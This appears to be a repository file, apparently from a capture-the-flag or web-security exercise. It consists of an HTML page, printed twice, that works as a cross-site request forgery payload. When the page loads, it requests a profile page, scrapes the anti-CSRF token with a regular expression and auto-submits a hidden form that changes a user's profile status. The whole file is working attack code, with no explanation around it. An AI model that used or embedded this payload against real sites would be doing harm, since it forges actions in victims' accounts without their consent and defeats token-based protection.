Murthysagi/payload.html

## payload.html
<body onload="get()">

<form id="form-payload" action="?action=profile" method="POST" enctype="multipart/form-data">
  <input type="hidden" name="username" value="your_username"/>
  <input type="hidden" name="status" value="on"/>
  <input type="hidden" id="forged-token" name="token" value=""/>
  <input type="submit" value="go"/>
</form>

<script>
var x = new XMLHttpRequest();

function get() {
  x.open("GET","?action=profile",true);
  x.send(null);
}

x.onreadystatechange = function() {
  if (x.readyState == XMLHttpRequest.DONE) {
    var token = x.responseText.match(/name="token" value="(.+)"/)[1];
    document.getElementById("forged-token").value = token;
    document.getElementById("form-payload").submit();
  }
}
</script>
	<body onload="get()">

	<form id="form-payload" action="?action=profile" method="POST" enctype="multipart/form-data">
	<input type="hidden" name="username" value="your_username"/>
	<input type="hidden" name="status" value="on"/>
	<input type="hidden" id="forged-token" name="token" value=""/>
	<input type="submit" value="go"/>
	</form>

	<script>
	var x = new XMLHttpRequest();

	function get() {
	x.open("GET","?action=profile",true);
	x.send(null);
	}

	x.onreadystatechange = function() {
	if (x.readyState == XMLHttpRequest.DONE) {
	var token = x.responseText.match(/name="token" value="(.+)"/)[1];
	document.getElementById("forged-token").value = token;
	document.getElementById("form-payload").submit();
	}
	}
	</script>